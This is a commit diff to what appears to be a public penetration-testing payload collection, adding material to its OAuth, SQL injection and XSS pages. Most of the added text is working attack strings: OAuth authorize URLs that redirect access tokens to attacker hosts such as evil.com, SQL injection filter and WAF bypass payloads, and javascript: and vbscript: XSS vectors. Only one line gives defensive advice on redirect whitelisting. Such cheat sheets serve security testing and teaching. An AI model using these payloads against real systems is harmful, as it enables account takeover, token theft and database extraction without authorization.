XSS,SQL OAuth Updated

OAuth/README.md

@@ -1,12 +1,20 @@
 # OAuth 2 - Common vulnerabilities
 
 ## Grabbing OAuth Token via redirect_uri
+Redirect to a controlled domain to get the access token
 ```
 https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
-https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost
 https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
-https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
 ```
+
+Redirect to an accepted Open URL in to get the access token
+```
+https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
+https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F
+```
+OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect.
+
+
 Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
 ```
 https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
@@ -31,3 +39,4 @@ and SHOULD revoke (when possible) all tokens previously issued based on that aut
 * http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
 * http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
 * http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
+* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html

README.md

@@ -5,12 +5,9 @@ I <3 pull requests :)
 
 Last modifications :
 * XSS paylods improved
-* Methodology added
+* OAuth vulnerabilities added
 * AWS Bucket added
-
+* SQL payloads updated
-
-Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
-
 
 # Tools
 

SQL injection/MySQL Injection.md

@@ -40,7 +40,6 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
 AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 
-
 ##MYSQL Time Based
 ```
 +BENCHMARK(40000000,SHA1(1337))+

SQL injection/README.md

@@ -112,6 +112,42 @@ admin") or "1"="1"/*
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 ```
 
+## WAF Bypass
+
+No Whitespace - bypass using comments
+```
+?id=1/*comment*/and/**/1=1/**/--
+```
+
+No Whitespace - bypass using parenthesis
+```
+?id=(1)and(1)=(1)--
+```
+
+No Comma - bypass using OFFSET and FROM
+```
+LIMIT 0,1 -> LIMIT 1 OFFSET 0
+SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). 
+```
+
+Blacklist using keywords - bypass using uppercase/lowercase
+```
+?id=1 AND 1=1#
+?id=1 AnD 1=1#
+?id=1 aNd 1=1#
+```
+
+Blacklist using keywords case insensitive - bypass using equivalent
+```
+AND   -> &&
+OR    -> ||
+=     -> LIKE,REGEXP, not < and not >
+WHERE -> HAVING
+```
+
+
+
+
 ## Thanks to - Other resources
 * MySQL:
   - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)

XSS injection/README.md

@@ -113,6 +113,9 @@ java%0dscript:alert(1)   - CR (\r)
 Using the escape character
  \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
 
+Using the newline and a comment //
+javascript://%0Aalert(1)
+javascript://anything%0D%0A%0D%0Awindow.alert(1)
 ```
 
 XSS with data:
@@ -121,7 +124,10 @@ data:text/html,<script>alert(0)</script>
 data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
 ```
 
-
+XSS with vbscript: only IE
+```
+vbscript:msgbox("XSS")
+```
 ## XSS in files
 XSS in XML
 ```